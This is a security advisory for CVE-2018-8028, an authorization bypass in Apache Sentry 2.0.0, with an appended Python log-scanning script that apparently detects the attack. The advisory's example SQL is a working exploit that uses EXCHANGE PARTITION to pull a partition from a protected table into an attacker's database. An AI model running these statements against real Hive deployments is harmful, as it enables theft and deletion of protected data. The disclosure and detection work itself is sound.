Sergio Peña
2018-08-23 16:38:32 UTC
[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive
Severity:
Major
Vendor:
The Apache Software Foundation
Versions Affected:
This vulnerability affects only Apache Sentry 2.0.0, due to the introduction of Hive 2.x support in that release.
Description:
An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without being authorized by Sentry.
This can give an attacker unauthorized access to the partitioned data of a Sentry-protected table, and can allow
an attacker to remove data from a Sentry-protected table.
Mitigation:
Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later.
Example:
The admin has created the following table in a database that the attacker
CREATE TABLE target_database1.aliens (name string) PARTITIONED BY (home_planet string, diet string);
ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth', diet='milk shakes');
ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='trapis-4', diet='sentient lifeforms with cheese');
CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY (home_planet string, diet string);
ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION (home_planet='earth', diet='milk shakes') WITH TABLE target_database1.aliens;
The attacker now has access to all of the data in the target partitions
with the privileges available to them on attacker_database.
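As an added illustration (not part of the advisory), the following detection check parses Hive statement records for the EXCHANGE PARTITION shape shown above and flags exchanges where the issuing user holds no grant on the WITH TABLE (source) database, which is the table whose data is read and removed. The 'user<TAB>statement' record format, the user names and the grant map are constructed assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

# Shape of the statement abused in CVE-2018-8028: the partition moves OUT of the table
# named after WITH TABLE and INTO the table named after ALTER TABLE, so the WITH TABLE
# side (the source) is the one whose data is read and then removed.
EXCHANGE_RE = re.compile(
    r"ALTER\s+TABLE\s+(?P<dst>[`\w.]+)\s+EXCHANGE\s+PARTITION\s*\((?P<spec>[^)]*)\)"
    r"\s+WITH\s+TABLE\s+(?P<src>[`\w.]+)", re.IGNORECASE)

Exchange = NamedTuple("Exchange", [("user", str), ("src_db", str), ("src_table", str),
                                   ("dst_db", str), ("dst_table", str), ("partition", dict)])

def split_name(name: str, default_db: str = "default") -> Tuple[str, str]:
    """Split an optionally qualified, optionally backquoted table name into (db, table)."""
    parts = [p.strip("`").lower() for p in name.split(".")]
    return (parts[0], parts[1]) if len(parts) == 2 else (default_db, parts[0])

def parse_exchange(user: str, statement: str) -> Optional[Exchange]:
    """Return an Exchange for an EXCHANGE PARTITION statement, None for anything else."""
    m = EXCHANGE_RE.search(statement)
    if not m:
        return None
    src_db, src_tbl = split_name(m.group("src"))
    dst_db, dst_tbl = split_name(m.group("dst"))
    spec = {k.lower(): v for k, v in re.findall(r"(\w+)\s*=\s*'([^']*)'", m.group("spec"))}
    return Exchange(user, src_db, src_tbl, dst_db, dst_tbl, spec)

def find_suspicious_exchanges(log_lines: List[str], db_grants: Dict[str, Set[str]]) -> List[Exchange]:
    """Flag exchanges whose source database is one the issuing user holds no grant on.
    log_lines are constructed 'user<TAB>statement' records; db_grants maps user -> databases."""
    flagged = []
    for line in log_lines:
        user, _, statement = line.partition("\t")
        ex = parse_exchange(user.strip(), statement)
        if ex and ex.src_db not in db_grants.get(ex.user, set()):
            flagged.append(ex)
    return flagged

# Constructed sample records: the user names and the admin's own statements are made up;
# the second record is the attacker statement quoted in the advisory.
SAMPLE_LOG = [
    "admin\tALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth', diet='milk shakes')",
    "mallory\tALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION "
    "(home_planet='earth', diet='milk shakes') WITH TABLE target_database1.aliens",
    "admin\tALTER TABLE target_database1.archive EXCHANGE PARTITION (diet='x') WITH TABLE target_database1.aliens",
]
SAMPLE_GRANTS = {"admin": {"target_database1"}, "mallory": {"attacker_database"}}
```

Only the second record is flagged: the admin's exchange stays inside a database the admin holds a grant on, while the attacker's source table lives in target_database1, which the attacker was never granted.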
Credit:
This issue was discovered by Benjamin Iglauer of Cloudera.
References:
https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry